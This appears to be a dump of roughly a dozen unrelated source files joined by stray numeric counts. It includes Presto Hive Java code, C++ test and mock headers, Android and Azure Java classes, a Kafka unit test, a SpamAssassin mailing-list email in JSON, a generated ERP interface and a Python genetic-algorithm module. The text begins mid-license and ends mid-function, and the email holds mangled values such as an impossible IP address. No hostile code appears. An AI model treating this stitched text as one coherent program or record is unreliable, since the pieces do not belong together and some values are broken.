* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.facebook.presto.hive;
import com.facebook.airlift.log.Logger;
import com.facebook.presto.common.io.DataOutput;
import com.facebook.presto.common.io.DataSink;
import com.facebook.presto.hive.datasink.DataSinkFactory;
import com.facebook.presto.hive.metastore.StorageFormat;
import com.facebook.presto.spi.ConnectorSession;
import com.facebook.presto.spi.PrestoException;
import com.google.common.collect.ImmutableList;
import com.google.common.util.concurrent.ListenableFuture;
import com.google.common.util.concurrent.ListeningExecutorService;
import io.airlift.slice.Slices;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.hive.ql.exec.FileSinkOperator.RecordWriter;
import org.apache.hadoop.mapred.JobConf;
import javax.inject.Inject;
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.List;
import java.util.Properties;
import static com.facebook.airlift.concurrent.MoreFutures.getFutureValue;
import static com.facebook.presto.common.io.DataOutput.createDataOutput;
import static com.facebook.presto.hive.HiveCompressionCodec.NONE;
import static com.facebook.presto.hive.HiveErrorCode.HIVE_WRITER_CLOSE_ERROR;
import static com.facebook.presto.hive.HiveWriteUtils.initializeSerializer;
import static com.facebook.presto.hive.pagefile.PageFileWriterFactory.createEmptyPageFile;
import static com.facebook.presto.hive.util.ConfigurationUtils.configureCompression;
import static com.google.common.util.concurrent.Futures.whenAllSucceed;
import static com.google.common.util.concurrent.MoreExecutors.directExecutor;
import static java.lang.String.format;
import static java.nio.file.Files.deleteIfExists;
import static java.nio.file.Files.readAllBytes;
import static java.util.Objects.requireNonNull;
import static java.util.UUID.randomUUID;
public class HiveZeroRowFileCreator
implements ZeroRowFileCreator
{
private static final Logger log = Logger.get(HiveZeroRowFileCreator.class);
private final HdfsEnvironment hdfsEnvironment;
private final DataSinkFactory dataSinkFactory;
private final ListeningExecutorService executor;
@Inject
public HiveZeroRowFileCreator(
HdfsEnvironment hdfsEnvironment,
DataSinkFactory dataSinkFactory,
@ForZeroRowFileCreator ListeningExecutorService zeroRowFileCreatorExecutor)
{
this.hdfsEnvironment = requireNonNull(hdfsEnvironment, "hdfsEnvironment is null");
this.dataSinkFactory = requireNonNull(dataSinkFactory, "dataSinkFactory is null");
this.executor = requireNonNull(zeroRowFileCreatorExecutor, "zeroRowFileCreatorExecutor is null");
}
@Override
public void createFiles(ConnectorSession session, HdfsContext hdfsContext, Path destinationDirectory, List<String> fileNames, StorageFormat format, HiveCompressionCodec compressionCodec, Properties schema)
{
if (fileNames.isEmpty()) {
return;
}
byte[] fileContent = generateZeroRowFile(session, hdfsContext, schema, format.getSerDe(), format.getOutputFormat(), compressionCodec);
List<ListenableFuture<?>> commitFutures = new ArrayList<>();
for (String fileName : fileNames) {
commitFutures.add(executor.submit(() -> createFile(hdfsContext, new Path(destinationDirectory, fileName), fileContent, session)));
}
ListenableFuture<?> listenableFutureAggregate = whenAllSucceed(commitFutures).call(() -> null, directExecutor());
try {
getFutureValue(listenableFutureAggregate, PrestoException.class);
}
catch (RuntimeException e) {
listenableFutureAggregate.cancel(true);
throw e;
}
}
private byte[] generateZeroRowFile(
ConnectorSession session,
HdfsContext hdfsContext,
Properties properties,
String serDe,
String outputFormatName,
HiveCompressionCodec compressionCodec)
{
String tmpDirectoryPath = System.getProperty("java.io.tmpdir");
String tmpFileName = format("presto-hive-zero-row-file-creator-%s-%s", session.getQueryId(), randomUUID().toString());
java.nio.file.Path tmpFilePath = Paths.get(tmpDirectoryPath, tmpFileName);
try {
Path target = new Path(format("file://%s/%s", tmpDirectoryPath, tmpFileName));
//https://github.com/prestodb/presto/issues/14401 JSON Format reader does not fetch compression from source system
JobConf conf = configureCompression(
hdfsEnvironment.getConfiguration(hdfsContext, target),
outputFormatName.equals(HiveStorageFormat.JSON.getOutputFormat()) ? compressionCodec : NONE);
if (outputFormatName.equals(HiveStorageFormat.PAGEFILE.getOutputFormat())) {
createEmptyPageFile(dataSinkFactory, session, target.getFileSystem(conf), target);
return readAllBytes(tmpFilePath);
}
// Some serializers such as Avro set a property in the schema.
initializeSerializer(conf, properties, serDe);
// The code below is not a try with resources because RecordWriter is not Closeable.
RecordWriter recordWriter = HiveWriteUtils.createRecordWriter(
target,
conf,
properties,
outputFormatName,
session);
recordWriter.close(false);
return readAllBytes(tmpFilePath);
}
catch (IOException e) {
throw new UncheckedIOException(e);
}
finally {
try {
deleteIfExists(tmpFilePath);
}
catch (IOException e) {
log.error(e, "Error deleting temporary file: %s", tmpFilePath);
}
}
}
private void createFile(HdfsContext hdfsContext, Path path, byte[] content, ConnectorSession session)
{
try {
FileSystem fs = hdfsEnvironment.getFileSystem(hdfsContext, path);
try (DataSink dataSink = dataSinkFactory.createDataSink(session, fs, path)) {
DataOutput dataOutput = createDataOutput(Slices.wrappedBuffer(content));
dataSink.write(ImmutableList.of(dataOutput));
}
}
catch (IOException e) {
throw new PrestoException(HIVE_WRITER_CLOSE_ERROR, "Error write zero-row file to Hive", e);
}
}
}
| 2,797 |
478 | /*
Q Light Controller - Unit tests
qlccapability_test.h
Copyright (C) <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0.txt
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
#ifndef QLCCAPABILITY_TEST_H
#define QLCCAPABILITY_TEST_H
#include <QObject>
#include "qlccapability.h"
class QLCCapability_Test : public QObject
{
Q_OBJECT
private slots:
void initial();
void min_data();
void min();
void max_data();
void max();
void middle();
void name();
void alias();
void overlaps();
void copy();
void load();
void loadWrongRoot();
void loadNoMin();
void loadNoMax();
void loadMinGreaterThanMax();
void save();
void savePreset();
void saveAlias();
};
#endif
| 402 |
634 | # To use jupytext in binder
c.NotebookApp.contents_manager_class = 'jupytext.TextFileContentsManager' # noqa
c.ContentsManager.preferred_jupytext_formats_read = 'py:percent' # noqa
| 68 |
1,350 | <gh_stars>1000+
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
package com.azure.spring.cloud.context.core.util;
import java.util.HashMap;
import java.util.Map;
import java.util.Objects;
/**
* Mapping an object's type to the object.
*/
public class TypeMap {
private final Map<Class<?>, Object> map = new HashMap<>();
/**
* Puts a new type and instance into the TypeMap.
*
* @param type The type.
* @param instance The instance.
* @param <T> The type.
*/
public <T> void put(Class<T> type, T instance) {
map.put(Objects.requireNonNull(type), instance);
}
/**
* Gets an instance from the TypeMap given the type.
*
* @param type The type.
* @param <T> The type.
* @return The instance.
*/
public <T> T get(Class<T> type) {
return type.cast(map.get(type));
}
}
| 355 |
356 | /**
* @author sunjianfei
* 此包包含了图片展示的各种样式,这些样式用户不必手动创建和调用,
* 可直接通过,ZjbImageLoader.create(url).setDisplayType(ZjbImageLoader.DISPLAY_SIMPLE)方式确定
*/
package com.zjb.loader.core.display; | 149 |
4,879 | package com.mapswithme.maps.purchase;
import androidx.annotation.StringRes;
import com.mapswithme.maps.R;
public enum BookmarksAllSubscriptionPage
{
GUIDES(R.string.all_pass_subscription_message_title,
R.string.all_pass_subscription_message_subtitle),
BOOKMARKS(R.string.all_pass_subscription_message_title_3,
R.string.all_pass_subscription_message_subtitle_3),
ELEVATION(R.string.all_pass_subscription_message_title_2,
R.string.all_pass_subscription_message_subtitle_2),
LONELY(R.string.all_pass_subscription_message_title_4,
R.string.all_pass_subscription_message_subtitle_4);
@StringRes
private final int mTitleId;
@StringRes
private final int mDescriptionId;
BookmarksAllSubscriptionPage(@StringRes int titleId, @StringRes int descriptionId)
{
mTitleId = titleId;
mDescriptionId = descriptionId;
}
@StringRes
public int getTitleId()
{
return mTitleId;
}
@StringRes
public int getDescriptionId()
{
return mDescriptionId;
}
}
| 388 |
634 | package com.intellij.openapi.roots.ui.configuration.projectRoot.daemon;
import com.intellij.icons.AllIcons;
import com.intellij.openapi.module.Module;
import com.intellij.openapi.roots.DependencyScope;
import com.intellij.openapi.util.text.StringUtil;
import consulo.roots.ui.configuration.ModulesConfigurator;
import consulo.ui.image.Image;
import javax.annotation.Nonnull;
import javax.annotation.Nullable;
/**
* @author nik
*/
public class UsageInModuleClasspath extends ProjectStructureElementUsage {
private final ModulesConfigurator myModulesConfigurator;
private final ModuleProjectStructureElement myContainingElement;
@Nullable
private final DependencyScope myScope;
private final ProjectStructureElement mySourceElement;
private final Module myModule;
public UsageInModuleClasspath(@Nonnull ModulesConfigurator modulesConfigurator,
@Nonnull ModuleProjectStructureElement containingElement,
ProjectStructureElement sourceElement,
@Nullable DependencyScope scope) {
myModulesConfigurator = modulesConfigurator;
myContainingElement = containingElement;
myScope = scope;
myModule = containingElement.getModule();
mySourceElement = sourceElement;
}
@Override
public ProjectStructureElement getSourceElement() {
return mySourceElement;
}
@Override
public ModuleProjectStructureElement getContainingElement() {
return myContainingElement;
}
public Module getModule() {
return myModule;
}
@Override
public String getPresentableName() {
return myModule.getName();
}
@Override
public PlaceInProjectStructure getPlace() {
return new PlaceInModuleClasspath(myModulesConfigurator, myModule, myContainingElement, mySourceElement);
}
@Override
public int hashCode() {
return myModule.hashCode()*31 + mySourceElement.hashCode();
}
@Override
public boolean equals(Object obj) {
return obj instanceof UsageInModuleClasspath && myModule.equals(((UsageInModuleClasspath)obj).myModule)
&& mySourceElement.equals(((UsageInModuleClasspath)obj).mySourceElement);
}
@Override
public Image getIcon() {
return AllIcons.Nodes.Module;
}
@Override
public void removeSourceElement() {
if (mySourceElement instanceof LibraryProjectStructureElement) {
//ModuleStructureConfigurable.getInstance(myModule.getProject())
// .removeLibraryOrderEntry(myModule, ((LibraryProjectStructureElement)mySourceElement).getLibrary());
}
}
@Nullable
@Override
public String getPresentableLocationInElement() {
return myScope != null && myScope != DependencyScope.COMPILE ? "[" + StringUtil.decapitalize(myScope.getDisplayName()) + "]" : null;
}
}
| 911 |
379 | <filename>src/test/java/com/sixt/service/framework/kafka/EagerMessageQueueTest.java
package com.sixt.service.framework.kafka;
import org.apache.kafka.clients.consumer.ConsumerRecord;
import org.junit.Before;
import org.junit.Test;
import org.mockito.ArgumentCaptor;
import static org.assertj.core.api.Assertions.assertThat;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.times;
import static org.mockito.Mockito.verify;
public class EagerMessageQueueTest {
private MessageExecutor messageExecutor;
private MessageQueue messageQueue;
private String topic = "topic";
private String defaultKey = "key";
private String defaultValue = "value";
@Before
public void setup() {
messageExecutor = mock(MessageExecutor.class);
messageQueue = new EagerMessageQueue(messageExecutor, 5000);
}
@Test
public void queue_addTwoRecord_allExecuted() {
ConsumerRecord record1 = new ConsumerRecord<>(topic, 0, 0, defaultKey, defaultValue);
messageQueue.add(record1);
ConsumerRecord record2 = new ConsumerRecord<>(topic, 0, 0, defaultKey, defaultValue);
messageQueue.add(record2);
ArgumentCaptor<ConsumerRecord> captor = ArgumentCaptor.forClass(ConsumerRecord.class);
verify(messageExecutor, times(2)).execute(captor.capture());
assertThat(captor.getAllValues().get(0)).isEqualTo(record1);
assertThat(captor.getAllValues().get(1)).isEqualTo(record2);
}
}
| 531 |
1,738 | /*
* All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or
* its licensors.
*
* For complete copyright and license terms please see the LICENSE at the root of this
* distribution (the "License"). All use of this software is governed by the License,
* or, if provided, by the license below or the license accompanying this file. Do not
* remove or modify any license notices. This file is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
*
*/
#pragma once
#include <IConsole.h>
#include <AzTest/AzTest.h>
#include <SFunctor.h>
#pragma warning( push )
#pragma warning( disable: 4373 ) // virtual function overrides differ only by const/volatile qualifiers, mock issue
class CVarMock
: public ICVar
{
public:
MOCK_METHOD0(Release, void());
MOCK_CONST_METHOD0(GetIVal, int());
MOCK_CONST_METHOD0(GetI64Val, int64());
MOCK_CONST_METHOD0(GetFVal, float());
MOCK_CONST_METHOD0(GetString, const char*());
MOCK_CONST_METHOD0(GetDataProbeString, const char*());
MOCK_METHOD1(Set, void(const char*));
MOCK_METHOD1(ForceSet, void(const char*));
MOCK_METHOD1(Set, void(const float));
MOCK_METHOD1(Set, void(const int));
MOCK_METHOD1(ClearFlags, void(const int));
MOCK_CONST_METHOD0(GetFlags, int());
MOCK_METHOD1(SetFlags, int(const int));
MOCK_METHOD0(GetType, int());
MOCK_CONST_METHOD0(GetName, const char*());
MOCK_METHOD0(GetHelp, const char*());
MOCK_CONST_METHOD0(IsConstCVar, bool());
MOCK_METHOD1(SetOnChangeCallback, void(ConsoleVarFunc));
MOCK_METHOD1(AddOnChangeFunctor, uint64(const SFunctor& pChangeFunctor));
MOCK_CONST_METHOD0(GetNumberOfOnChangeFunctors, uint64());
MOCK_CONST_METHOD1(GetOnChangeFunctor, const SFunctor&(uint64));
MOCK_METHOD1(RemoveOnChangeFunctor, bool(uint64));
MOCK_CONST_METHOD0(GetOnChangeCallback, ConsoleVarFunc());
MOCK_CONST_METHOD1(GetMemoryUsage, void(class ICrySizer* pSizer));
MOCK_CONST_METHOD0(GetRealIVal, int());
MOCK_METHOD2(SetLimits, void(float, float));
MOCK_METHOD2(GetLimits, void(float&, float&));
MOCK_METHOD0(HasCustomLimits, bool());
#if defined(DEDICATED_SERVER)
MOCK_METHOD1(SetDataProbeString, void(const char*));
#endif
};
#pragma warning( pop )
| 856 |
3,428 | <filename>lib/node_modules/@stdlib/datasets/spam-assassin/data/easy-ham-2/01276.2492bcd768a07a92ee22c4762db629a2.json
{"id":"01276","group":"easy-ham-2","checksum":{"type":"MD5","value":"2492bcd768a07a92ee22c4762db629a2"},"text":"From <EMAIL> Wed Aug 21 18:16:30 2002\nReturn-Path: <<EMAIL>>\nDelivered-To: y<EMAIL>.netnoteinc.com\nReceived: from localhost (localhost [127.0.0.1])\n\tby phobos.labs.netnoteinc.com (Postfix) with ESMTP id DC38243C38\n\tfor <jm@localhost>; Wed, 21 Aug 2002 13:16:16 -0400 (EDT)\nReceived: from phobos [127.0.0.1]\n\tby localhost with IMAP (fetchmail-5.9.0)\n\tfor jm@localhost (single-drop); Wed, 21 Aug 2002 18:16:16 +0100 (IST)\nReceived: from usw-sf-list2.sourceforge.net (usw-sf-fw2.sourceforge.net\n [2192.168.127.1252]) by dogma.slashnull.org (8.11.6/8.11.6) with ESMTP id\n g7LHH2Z02984 for <<EMAIL>>; Wed, 21 Aug 2002 18:17:02 +0100\nReceived: from usw-sf-list1-b.sourceforge.net ([10.3.1.13]\n helo=usw-sf-list1.sourceforge.net) by usw-sf-list2.sourceforge.net with\n esmtp (Exim 3.31-VA-mm2 #1 (Debian)) id 17hZ5V-0000Qp-00; Wed,\n 21 Aug 2002 10:16:09 -0700\nReceived: from alpha.exit0.org.1-254.250.190.207.in-addr.arpa\n ([172.16.31.10] helo=alpha.exit0.org) by usw-sf-list1.sourceforge.net\n with smtp (Exim 3.31-VA-mm2 #1 (Debian)) id 17hZ55-0007tT-00 for\n <<EMAIL>>; Wed, 21 Aug 2002 10:15:43 -0700\nReceived: (qmail 16304 invoked by uid 7794); 21 Aug 2002 17:17:38 -0000\nReceived: from <EMAIL> by alpha by uid 7791 with\n qmail-scanner-1.13 (spamassassin: 2.31. Clear:. Processed in 0.018966\n secs); 21 Aug 2002 17:17:38 -0000\nReceived: from outbound.infosysinc.com (HELO shiva.infosysinc.com)\n (172.16.31.10) by 0 with SMTP; 21 Aug 2002 17:17:38 -0000\nSubject: Re: [SAtalk] CONFIDENTIAL\nFrom: \"f. <NAME>\" <<EMAIL>>\nTo: <EMAIL>\nIn-Reply-To: <<EMAIL>>\nReferences: <1<EMAIL>-1<EMAIL>>\nContent-Type: text/plain\nContent-Transfer-Encoding: 7bit\nX-Mailer: Ximian Evolution 1.0.3 (1.0.3-6)\nMessage-Id: <1029935708.2998.1.camel@shiva>\nMIME-Version: 1.0\nSender: <EMAIL>\nErrors-To: <EMAIL>\nX-Beenthere: <EMAIL>\nX-Mailman-Version: 2.0.9-sf.net\nPrecedence: bulk\nList-Help: <mailto:<EMAIL>?subject=help>\nList-Post: <mailto:<EMAIL>>\nList-Subscribe: <https://example.sourceforge.net/lists/listinfo/spamassassin-talk>,\n <mailto:<EMAIL>?subject=subscribe>\nList-Id: Talk about SpamAssassin <spamassassin-talk.example.sourceforge.net>\nList-Unsubscribe: <https://example.sourceforge.net/lists/listinfo/spamassassin-talk>,\n <mailto:<EMAIL>?subject=unsubscribe>\nList-Archive: <http://www.geocrawler.com/redir-sf.php3?list=spamassassin-talk>\nX-Original-Date: 21 Aug 2002 13:15:07 +0000\nDate: 21 Aug 2002 13:15:07 +0000\n\nOn Wed, 2002-08-21 at 06:42, <NAME> wrote:\n> On Tuesday, August 20, 2002, at 09:38 PM, <NAME> wrote:\n> \n> > Of course, since I have this list before my SA filter, it got through.\n> \n> That's exactly what they're counting on! Actually, I think it's \n> more likely spammer humor, and sa-talk is on a list somewhere.\n> \n\nOh, I dunno. Humor or not it, lets some of us with new installs test out\nSA with \"real\" email.\n\n:)\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone? Get a new here for FREE!\nhttps://www.inphonic.com/r.asp?r=sourceforge1&refcode1=vs3390\n_______________________________________________\nSpamassassin-talk mailing list\n<EMAIL>\nhttps://lists.sourceforge.net/lists/listinfo/spamassassin-talk\n\n"} | 1,483 |
1,144 | package de.metas.dunning.model;
/** Generated Interface for C_DunningDoc_Line_Source
* @author Adempiere (generated)
*/
@SuppressWarnings("javadoc")
public interface I_C_DunningDoc_Line_Source
{
/** TableName=C_DunningDoc_Line_Source */
public static final String Table_Name = "C_DunningDoc_Line_Source";
/** AD_Table_ID=540403 */
// public static final int Table_ID = org.compiere.model.MTable.getTable_ID(Table_Name);
// org.compiere.util.KeyNamePair Model = new org.compiere.util.KeyNamePair(Table_ID, Table_Name);
/** AccessLevel = 3 - Client - Org
*/
// java.math.BigDecimal accessLevel = java.math.BigDecimal.valueOf(3);
/** Load Meta Data */
/**
* Get Mandant.
* Mandant für diese Installation.
*
* <br>Type: TableDir
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public int getAD_Client_ID();
public org.compiere.model.I_AD_Client getAD_Client();
/** Column definition for AD_Client_ID */
public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, org.compiere.model.I_AD_Client> COLUMN_AD_Client_ID = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, org.compiere.model.I_AD_Client>(I_C_DunningDoc_Line_Source.class, "AD_Client_ID", org.compiere.model.I_AD_Client.class);
/** Column name AD_Client_ID */
public static final String COLUMNNAME_AD_Client_ID = "AD_Client_ID";
/**
* Set Sektion.
* Organisatorische Einheit des Mandanten
*
* <br>Type: TableDir
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public void setAD_Org_ID (int AD_Org_ID);
/**
* Get Sektion.
* Organisatorische Einheit des Mandanten
*
* <br>Type: TableDir
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public int getAD_Org_ID();
public org.compiere.model.I_AD_Org getAD_Org();
public void setAD_Org(org.compiere.model.I_AD_Org AD_Org);
/** Column definition for AD_Org_ID */
public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, org.compiere.model.I_AD_Org> COLUMN_AD_Org_ID = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, org.compiere.model.I_AD_Org>(I_C_DunningDoc_Line_Source.class, "AD_Org_ID", org.compiere.model.I_AD_Org.class);
/** Column name AD_Org_ID */
public static final String COLUMNNAME_AD_Org_ID = "AD_Org_ID";
/**
* Set Mahnungsdisposition.
*
* <br>Type: Search
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public void setC_Dunning_Candidate_ID (int C_Dunning_Candidate_ID);
/**
* Get Mahnungsdisposition.
*
* <br>Type: Search
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public int getC_Dunning_Candidate_ID();
public de.metas.dunning.model.I_C_Dunning_Candidate getC_Dunning_Candidate();
public void setC_Dunning_Candidate(de.metas.dunning.model.I_C_Dunning_Candidate C_Dunning_Candidate);
/** Column definition for C_Dunning_Candidate_ID */
public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, de.metas.dunning.model.I_C_Dunning_Candidate> COLUMN_C_Dunning_Candidate_ID = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, de.metas.dunning.model.I_C_Dunning_Candidate>(I_C_DunningDoc_Line_Source.class, "C_Dunning_Candidate_ID", de.metas.dunning.model.I_C_Dunning_Candidate.class);
/** Column name C_Dunning_Candidate_ID */
public static final String COLUMNNAME_C_Dunning_Candidate_ID = "C_Dunning_Candidate_ID";
/**
* Set Dunning Document Line.
*
* <br>Type: Search
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public void setC_DunningDoc_Line_ID (int C_DunningDoc_Line_ID);
/**
* Get Dunning Document Line.
*
* <br>Type: Search
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public int getC_DunningDoc_Line_ID();
public de.metas.dunning.model.I_C_DunningDoc_Line getC_DunningDoc_Line();
public void setC_DunningDoc_Line(de.metas.dunning.model.I_C_DunningDoc_Line C_DunningDoc_Line);
/** Column definition for C_DunningDoc_Line_ID */
public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, de.metas.dunning.model.I_C_DunningDoc_Line> COLUMN_C_DunningDoc_Line_ID = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, de.metas.dunning.model.I_C_DunningDoc_Line>(I_C_DunningDoc_Line_Source.class, "C_DunningDoc_Line_ID", de.metas.dunning.model.I_C_DunningDoc_Line.class);
/** Column name C_DunningDoc_Line_ID */
public static final String COLUMNNAME_C_DunningDoc_Line_ID = "C_DunningDoc_Line_ID";
/**
* Set Dunning Document Line Source.
*
* <br>Type: ID
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public void setC_DunningDoc_Line_Source_ID (int C_DunningDoc_Line_Source_ID);
/**
* Get Dunning Document Line Source.
*
* <br>Type: ID
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public int getC_DunningDoc_Line_Source_ID();
/** Column definition for C_DunningDoc_Line_Source_ID */
public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object> COLUMN_C_DunningDoc_Line_Source_ID = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object>(I_C_DunningDoc_Line_Source.class, "C_DunningDoc_Line_Source_ID", null);
/** Column name C_DunningDoc_Line_Source_ID */
public static final String COLUMNNAME_C_DunningDoc_Line_Source_ID = "C_DunningDoc_Line_Source_ID";
/**
* Get Erstellt.
* Datum, an dem dieser Eintrag erstellt wurde
*
* <br>Type: DateTime
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public java.sql.Timestamp getCreated();
/** Column definition for Created */
public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object> COLUMN_Created = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object>(I_C_DunningDoc_Line_Source.class, "Created", null);
/** Column name Created */
public static final String COLUMNNAME_Created = "Created";
/**
* Get Erstellt durch.
* Nutzer, der diesen Eintrag erstellt hat
*
* <br>Type: Table
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public int getCreatedBy();
/** Column definition for CreatedBy */
public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, org.compiere.model.I_AD_User> COLUMN_CreatedBy = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, org.compiere.model.I_AD_User>(I_C_DunningDoc_Line_Source.class, "CreatedBy", org.compiere.model.I_AD_User.class);
/** Column name CreatedBy */
public static final String COLUMNNAME_CreatedBy = "CreatedBy";
/**
* Set Aktiv.
* Der Eintrag ist im System aktiv
*
* <br>Type: YesNo
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public void setIsActive (boolean IsActive);
/**
* Get Aktiv.
* Der Eintrag ist im System aktiv
*
* <br>Type: YesNo
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public boolean isActive();
/** Column definition for IsActive */
public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object> COLUMN_IsActive = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object>(I_C_DunningDoc_Line_Source.class, "IsActive", null);
/** Column name IsActive */
public static final String COLUMNNAME_IsActive = "IsActive";
/**
* Set Massenaustritt.
*
* <br>Type: YesNo
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public void setIsWriteOff (boolean IsWriteOff);
/**
* Get Massenaustritt.
*
* <br>Type: YesNo
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public boolean isWriteOff();
/** Column definition for IsWriteOff */
public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object> COLUMN_IsWriteOff = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object>(I_C_DunningDoc_Line_Source.class, "IsWriteOff", null);
/** Column name IsWriteOff */
public static final String COLUMNNAME_IsWriteOff = "IsWriteOff";
/**
* Set Massenaustritt Applied.
*
* <br>Type: YesNo
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public void setIsWriteOffApplied (boolean IsWriteOffApplied);
/**
* Get Massenaustritt Applied.
*
* <br>Type: YesNo
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public boolean isWriteOffApplied();
/** Column definition for IsWriteOffApplied */
public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object> COLUMN_IsWriteOffApplied = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object>(I_C_DunningDoc_Line_Source.class, "IsWriteOffApplied", null);
/** Column name IsWriteOffApplied */
public static final String COLUMNNAME_IsWriteOffApplied = "IsWriteOffApplied";
/**
* Set Verarbeitet.
* Checkbox sagt aus, ob der Beleg verarbeitet wurde.
*
* <br>Type: YesNo
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public void setProcessed (boolean Processed);
/**
* Get Verarbeitet.
* Checkbox sagt aus, ob der Beleg verarbeitet wurde.
*
* <br>Type: YesNo
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public boolean isProcessed();
/** Column definition for Processed */
public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object> COLUMN_Processed = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object>(I_C_DunningDoc_Line_Source.class, "Processed", null);
/** Column name Processed */
public static final String COLUMNNAME_Processed = "Processed";
/**
* Get Aktualisiert.
* Datum, an dem dieser Eintrag aktualisiert wurde
*
* <br>Type: DateTime
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public java.sql.Timestamp getUpdated();
/** Column definition for Updated */
public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object> COLUMN_Updated = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, Object>(I_C_DunningDoc_Line_Source.class, "Updated", null);
/** Column name Updated */
public static final String COLUMNNAME_Updated = "Updated";
/**
* Get Aktualisiert durch.
* Nutzer, der diesen Eintrag aktualisiert hat
*
* <br>Type: Table
* <br>Mandatory: true
* <br>Virtual Column: false
*/
public int getUpdatedBy();
/** Column definition for UpdatedBy */
public static final org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, org.compiere.model.I_AD_User> COLUMN_UpdatedBy = new org.adempiere.model.ModelColumn<I_C_DunningDoc_Line_Source, org.compiere.model.I_AD_User>(I_C_DunningDoc_Line_Source.class, "UpdatedBy", org.compiere.model.I_AD_User.class);
/** Column name UpdatedBy */
public static final String COLUMNNAME_UpdatedBy = "UpdatedBy";
}
| 4,040 |
1,008 | # File: genetic.py
# from chapter 3 of _Genetic Algorithms with Python_
#
# Author: <NAME> <<EMAIL>>
# Copyright (c) 2016 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
import random
import statistics
import sys
import time
def _generate_parent(length, geneSet, get_fitness):
genes = []
while len(genes) < length:
sampleSize = min(length - len(genes), len(geneSet))
genes.extend(random.sample(geneSet, sampleSize))
fitness = get_fitness(genes)
return Chromosome(genes, fitness)
def _mutate(parent, geneSet, get_fitness):
childGenes = parent.Genes[:]
index = random.randrange(0, len(parent.Genes))
newGene, alternate = random.sample(geneSet, 2)
childGenes[index] = alternate if newGene == childGenes[index] else newGene
fitness = get_fitness(childGenes)
return Chromosome(childGenes, fitness)
def get_best(get_fitness, targetLen, optimalFitness, geneSet, display):
random.seed()
def fnMutate(parent):
return _mutate(parent, geneSet, get_fitness)
def fnGenerateParent():
return _generate_parent(targetLen, geneSet, get_fitness)
for improvement in _get_improvement(fnMutate, fnGenerateParent):
display(improvement)
if not optimalFitness > improvement.Fitness:
return improvement
def _get_improvement(new_child, generate_parent):
bestParent = generate_parent()
yield bestParent
while True:
child = new_child(bestParent)
if bestParent.Fitness > child.Fitness:
continue
if not child.Fitness > bestParent.Fitness:
bestParent = child
continue
yield child
bestParent = child
class Chromosome:
def __init__(self, genes, fitness):
self.Genes = genes
self.Fitness = fitness
class Benchmark:
@staticmethod
def run(function):
timings = []
stdout = sys.stdout
for i in range(100):
sys.stdout = None
startTime = time.time()
